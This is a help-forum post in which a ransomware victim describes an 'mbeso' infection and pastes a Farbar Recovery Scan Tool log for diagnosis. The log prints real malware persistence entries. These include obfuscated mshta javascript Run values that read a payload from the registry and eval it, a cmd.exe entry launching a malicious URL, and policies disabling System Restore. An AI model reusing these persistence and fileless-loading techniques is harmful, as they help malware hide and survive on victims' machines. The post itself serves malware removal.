Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

mbeso Ransomware. Some files are encrypted


  • This topic is locked This topic is locked
19 replies to this topic

#1 snapjaw

snapjaw

  • Members
  • 72 posts
  • OFFLINE
  •  

Posted 10 November 2015 - 12:45 PM

Hi my computer was acting slow and I accidentally hit yes on this pop-up.

 

a5fbic.jpg

 

The only thing I noticed afterwards is that some icons on my desktop turned into a white sheet of paper. I turned my computer off and on by hitting the power switch on the back and when it restarted to the desktop, this text file opened by itself.

 

91f347.jpg

 

I don't know if you can see it but the txt file is called howto_recover_file_mbeso. Now I can't open task manager, my system restore points are gone and malwarebytes won't run. The only files I have noticed are encrypted are text files; they have a .ccc ending now. Music and video files still play as well as the internet. Here are my pc specs and a FRST log.

 

My PC Specs
Windows 7 Home Premium 64 bit
Intel Core i5-2500K CPU @ 3.30 GHz
4 GB RAM
Evga Geforce GTX 580

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:07-11-2015
Ran by KW (administrator) on KEVIN-PC (10-11-2015 11:19:15)
Running from C:\Users\KW\Desktop
Loaded Profiles: KW (Available Profiles: KW)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
() C:\ProgramData\igfxCUIService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
() C:\Program Files (x86)\NETGEAR\WNDA3100v2\WNDA3100v2.exe
() C:\Users\KW\AppData\Roaming\popry-a.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
() C:\Program Files (x86)\NETGEAR\WNDA3100v2\WifiSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(D-Link Corp.) C:\Program Files (x86)\D-Link\DWA-556 revA\wirelesscm.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Disc Soft Ltd) C:\Users\KW\Downloads\Applications\Daemon Tools\Daemon Tools Lite 10\DAEMON Tools Lite\DiscSoftBusService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\consent.exe
(Microsoft Corporation) C:\Windows\System32\PresentationHost.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil64_16_0_0_235_ActiveX.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7284328 2011-08-30] (Realtek Semiconductor)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2465088 2014-11-17] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM-x32\...\Run: [codec Settings UAC Manager] => C:\Windows\SysWOW64\C2MP\CodecUACManager.exe [60432 2015-03-05] ()
HKLM-x32\...\Run: [Babakan] => cmd.exe /k if %date:~6,4%%date:~3,2%%date:~0,2% LEQ 20131027 (exit) else (start hxxp://dinoraptzor.org && exit)
HKLM-x32\...\Run: [qewr2342] => C:\Users\KW\AppData\Roaming\popry-a.exe [466944 2015-11-09] ()
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2012-09-11] (Google Inc.)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [DAEMON Tools Lite Automount] => C:\Users\KW\Downloads\Applications\Daemon Tools\Daemon Tools Lite 10\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [MSConfig] => C:\Users\KW\nsrulzde.exe [42729472 2015-11-09] (Intrusion falcon)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [qewr2342] => C:\Users\KW\AppData\Roaming\popry-a.exe [466944 2015-11-09] ()
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [igfxCUIService] => C:\ProgramData\igfxCUIService.exe [4096 2015-11-09] ()
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [**7fae0a5e<*>] => mshta javascript:UAD0hTWO7="4FeVa";zV49=new%20ActiveXObject("WScript.Shell");AmhGb2JU="IVvGbj5Im0";RFfX53=zV49.RegRead("HKCU\\software\\e73cf62062\\8b3a4602");JroDWU94GX="Ym8vbyTbb0";eval(RFfX53);Ou4b (the data entry has 13 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Run: [**ca7e5942<*>] => mshta javascript:spA4CiQ="RkJDrEB";I66o=new%20ActiveXObject("WScript.Shell");skS8mNl2="GasX";he1Qt7=I66o.RegRead("HKCU\\software\\e73cf62062\\8b3a4602");kaUc5Rfu="6YqP6NSb";eval(he1Qt7);u0D0pmrf="e"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Policies\system: [LogonHoursAction] 2
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\Policies\system: [DontDisplayLogonHoursWarnings] 1
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\...\MountPoints2: D - D:\Setup.exe
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\PhotoScreensaver.scr [477696 2010-11-20] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodecPackTrayMenu.lnk [2015-03-25]
ShortcutTarget: CodecPackTrayMenu.lnk -> C:\Windows\SysWOW64\C2MP\TrayMenu.exe (No File)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNDA3100v2 Smart Wizard.lnk [2012-02-17]
ShortcutTarget: NETGEAR WNDA3100v2 Smart Wizard.lnk -> C:\Program Files (x86)\NETGEAR\WNDA3100v2\WNDA3100v2.exe ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Wireless Connection Manager.lnk [2012-03-04]
ShortcutTarget: Wireless Connection Manager.lnk -> C:\Program Files (x86)\D-Link\DWA-556 revA\wirelesscm.exe (D-Link Corp.)
Startup: C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.html [2015-11-09] ()
Startup: C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\howto_recover_file_mbeso.txt [2015-11-09] ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: 127.0.0.1 idnet.ua-corp.com
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{40DEB06D-8BDB-4844-8B44-A2B8ED497A17}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{5722F3C1-0AE8-42B0-B73C-1053D96A8EAE}: [DhcpNameServer] 24.93.41.125 24.93.41.126
Tcpip\..\Interfaces\{72ACAD53-266F-42D0-ADF7-56D931A839D2}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{A4BAD1D7-7354-4AAA-8E6E-E64CC99E7BDE}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{ACD59940-2998-4055-898C-AA9DC8833298}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{FEC4A0D6-8BDB-4D47-A335-9213828537F7}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKU\S-1-5-21-1995585355-2568222046-1999612799-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.magicmicro.com
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> {483830EE-A4CD-4b71-B0A3-3D82E62A6909} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1995585355-2568222046-1999612799-1002 -> {028D7B20-77F6-433E-8AF4-E0206FE13E1E} URL = hxxps://www.flickr.com/search/?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1995585355-2568222046-1999612799-1002 -> {1990B8FA-C6B6-42DE-87AE-643474758F40} URL = hxxps://delicious.com/search?p={searchTerms}
SearchScopes: HKU\S-1-5-21-1995585355-2568222046-1999612799-1002 -> {DD280844-55BA-407D-B945-EC0B1176E144} URL = hxxps://search.yahoo.com/search?p={searchTerms}&ei=utf-8&fr=chr-yie11
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_25\bin\ssv.dll [2014-12-14] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-09-22] (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_25\bin\jp2ssv.dll [2014-12-14] (Oracle Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\ssv.dll [2014-12-14] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-09-22] (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\jp2ssv.dll [2014-12-14] (Oracle Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-09-22] (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-09-22] (Google Inc.)
Toolbar: HKU\S-1-5-21-1995585355-2568222046-1999612799-1002 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-09-22] (Google Inc.)

FireFox:
========
FF ProfilePath: C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_16_0_0_235.dll [2014-12-14] ()
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-12-14] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-12-14] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_235.dll [2014-12-14] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2015-01-13] (EA Digital Illusions CE AB)
FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-12-14] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-12-14] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-08-06] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-08-06] (NVIDIA Corporation)
FF Plugin-x32: @t.garena.com/garenatalk -> C:\Users\KW\Downloads\Applications\Garena Plus\bbtalk\plugins\npPlugin\npGarenaTalkPlugin.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-19] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-19] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-09-26] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1995585355-2568222046-1999612799-1002: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\KW\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-09-05] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-1995585355-2568222046-1999612799-1002: electronicarts.com/GameFacePlugin -> C:\Users\KW\AppData\Roaming\Electronic Arts\Game Face\npGameFacePlugin.dll [2012-12-20] (Electronic Arts)
FF SearchPlugin: C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.html [2015-11-09]
FF SearchPlugin: C:\Users\KW\AppData\Roaming\Mozilla\Firefox\Profiles\kfpcf5c9.default\searchplugins\howto_recover_file_mbeso.txt [2015-11-09]

Chrome:
=======
CHR HomePage: Default -> hxxps://www.google.com/
CHR Profile: C:\Users\KW\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (WOT: Web of Trust, Website Reputation Ratings) - C:\Users\KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhmmomiinigofkjcapegjjndpbikblnp [2015-11-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\KW\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-09]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77128 2015-01-19] (Apple Inc.)
R3 Disc Soft Lite Bus Service; C:\Users\KW\Downloads\Applications\Daemon Tools\Daemon Tools Lite 10\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd)
S3 GalaxyCommunication; C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe [6677048 2015-07-06] (GOG.com)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1149760 2014-11-17] (NVIDIA Corporation)
S2 MBAMScheduler; C:\Users\KW\Downloads\Applications\Malwarebytes Anti-Malware second try\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)
S2 MBAMService; C:\Users\KW\Downloads\Applications\Malwarebytes Anti-Malware second try\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1796928 2014-11-17] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [19821376 2014-11-17] (NVIDIA Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [1931632 2015-04-12] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76152 2015-04-12] ()
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
R2 WSWNDA3100; C:\Program Files (x86)\NETGEAR\WNDA3100v2\WifiSvc.exe [272864 2010-08-19] ()
S3 GalaxyClientService; "C:\Program Files (x86)\GalaxyClient\GalaxyClientService.exe" [X]
S2 PinnacleUpdateSvc; C:\Users\KW\Downloads\Games\Install Directory\Mass Effect 3 360 Pinnacle Game Profiler\pinnacle_updater.exe [X]
S3 Secunia PSI Agent; "C:\Program Files (x86)\Secunia\PSI\PSIA.exe" --start-service [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
S3 AR5416; C:\Windows\System32\DRIVERS\athwx.sys [2065824 2010-07-20] (Atheros Communications, Inc.)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2015-06-30] (Disc Soft Ltd)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2014-12-05] ()
S3 MAUSBFASTTRACK; C:\Windows\System32\DRIVERS\MAudioFastTrack.sys [187912 2010-12-07] (Avid Technology, Inc.)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [122584 2015-11-09] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-05-12] (Malwarebytes Corporation)
S3 MTsensor; C:\Windows\system32\drivers\ASACPI.sys [8192 2005-03-29] ()
S3 NPF; C:\Windows\System32\DRIVERS\npf.sys [47632 2010-02-03] (CACE Technologies, Inc.)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20800 2014-11-17] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [38216 2014-10-03] (NVIDIA Corporation)
S3 PSI; C:\Windows\System32\DRIVERS\psi_mf_amd64.sys [18456 2014-11-28] (Secunia)
R3 ScpVBus; C:\Windows\System32\DRIVERS\ScpVBus.sys [39168 2013-05-19] (Scarlet.Crush Productions)
R3 zttap200; C:\Windows\System32\DRIVERS\zttap200.sys [31896 2014-03-05] ()
S3 cleanhlp; \??\C:\Users\KW\Downloads\Applications\Emirson Emergency Kit\Emirson Emergency Kit (Extracted Files)\bin\cleanhlp64.sys [X]
S3 NvStUSB; \SystemRoot\system32\drivers\nvstusb.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-11-10 11:19 - 2015-11-10 11:20 - 00020757 _____ C:\Users\KW\Desktop\FRST.txt
2015-11-10 11:17 - 2015-11-10 11:19 - 00000000 ____D C:\FRST
2015-11-10 11:17 - 2015-11-10 11:17 - 02198528 _____ (Farbar) C:\Users\KW\Desktop\FRST64.exe
2015-11-10 11:12 - 2015-11-10 11:12 - 00000253 _____ C:\Users\KW\Documents\recover_file_dnxuiowmj.txt
2015-11-09 20:39 - 2015-11-09 20:39 - 00000253 _____ C:\Users\KW\Documents\recover_file_ihgmakdix.txt
2015-11-09 20:19 - 2015-11-09 20:19 - 00005701 _____ C:\Users\KW\Documents\howto_recover_file_mbeso.html
2015-11-09 20:19 - 2015-11-09 20:19 - 00002561 _____ C:\Users\KW\Documents\howto_recover_file_mbeso.txt
2015-11-09 20:16 - 2015-11-09 20:16 - 00005701 _____ C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.html
2015-11-09 20:16 - 2015-11-09 20:16 - 00005701 _____ C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.html
2015-11-09 20:16 - 2015-11-09 20:16 - 00005701 _____ C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.html
2015-11-09 20:16 - 2015-11-09 20:16 - 00005701 _____ C:\Users\KW\AppData\howto_recover_file_mbeso.html
2015-11-09 20:16 - 2015-11-09 20:16 - 00002561 _____ C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\howto_recover_file_mbeso.txt
2015-11-09 20:16 - 2015-11-09 20:16 - 00002561 _____ C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\howto_recover_file_mbeso.txt
2015-11-09 20:16 - 2015-11-09 20:16 - 00002561 _____ C:\Users\KW\AppData\Roaming\howto_recover_file_mbeso.txt
2015-11-09 20:16 - 2015-11-09 20:16 - 00002561 _____ C:\Users\KW\AppData\howto_recover_file_mbeso.txt
2015-11-09 20:13 - 2015-11-09 20:13 - 00005701 _____ C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.html
2015-11-09 20:13 - 2015-11-09 20:13 - 00002561 _____ C:\Users\KW\AppData\LocalLow\howto_recover_file_mbeso.txt
2015-11-09 18:37 - 2015-11-09 20:12 - 00005701 _____ C:\Users\KW\AppData\Local\howto_recover_file_mbeso.html
2015-11-09 18:37 - 2015-11-09 20:12 - 00002561 _____ C:\Users\KW\AppData\Local\howto_recover_file_mbeso.txt
2015-11-09 18:37 - 2015-11-09 18:37 - 00005701 _____ C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.html
2015-11-09 18:37 - 2015-11-09 18:37 - 00002561 _____ C:\Users\KW\AppData\Local\Apps\howto_recover_file_mbeso.txt
2015-11-09 18:36 - 2015-11-09 18:37 - 00005701 _____ C:\ProgramData\howto_recover_file_mbeso.html
2015-11-09 18:36 - 2015-11-09 18:37 - 00002561 _____ C:\ProgramData\howto_recover_file_mbeso.txt
2015-11-09 18:36 - 2015-11-09 18:36 - 00005701 _____ C:\Users\Public\Documents\howto_recover_file_mbeso.html
2015-11-09 18:36 - 2015-11-09 18:36 - 00002561 _____ C:\Users\Public\Documents\howto_recover_file_mbeso.txt
2015-11-09 18:30 - 2015-11-09 18:30 - 00004096 _____ C:\ProgramData\igfxCUIService.exe
2015-11-09 18:29 - 2015-11-09 18:29 - 42729472 ____H (Intrusion falcon) C:\Users\KW\nsrulzde.exe
2015-11-09 18:29 - 2015-11-09 18:29 - 00466944 _____ C:\Users\KW\AppData\Roaming\popry-a.exe
2015-11-09 18:29 - 2015-11-09 18:29 - 00004096 _____ C:\ProgramData\IntelCpHeciSvc.dll
2015-11-09 18:29 - 2015-11-09 18:29 - 00000253 _____ C:\Users\KW\Documents\recover_file_foogsogfe.txt
2015-11-09 18:04 - 2015-11-09 20:13 - 00000000 ____D C:\Users\KW\AppData\LocalLow\uTorrent
2015-11-09 18:03 - 2015-11-09 18:03 - 00018568 _____ C:\Users\KW\Downloads\[kat.cr]animerg.naruto.shippuden.season.13.dub.phr0sty.torrent
2015-11-09 18:03 - 2015-11-09 18:03 - 00018568 _____ C:\Users\KW\Downloads\[kat.cr]animerg.naruto.shippuden.season.13.dub.phr0sty (1).torrent
2015-11-07 16:39 - 2015-11-07 16:39 - 00136961 _____ C:\Users\KW\Downloads\[kat.cr]naruto.shippuden.season.1.12.episode.1.275.dual.audio.eng.jap.torrent
2015-11-05 22:29 - 2015-11-05 22:29 - 00015688 _____ C:\Users\KW\Downloads\[kat.cr]m.ni.naruto.shippuden.season.10.ep.197.221.720p.dual.audio.english.softsub.torrent
2015-11-05 18:30 - 2015-11-05 18:30 - 00023537 _____ C:\Users\KW\Downloads\[kat.cr]m.ni.naruto.shippuden.720p.season.9.ep.176.196.english.dubbed.subbed.torrent
2015-11-04 20:03 - 2015-11-04 20:03 - 00002503 _____ C:\Users\Public\Desktop\NARUTO SHIPPUDEN Ultimate Ninja STORM 3 Full Burst.lnk
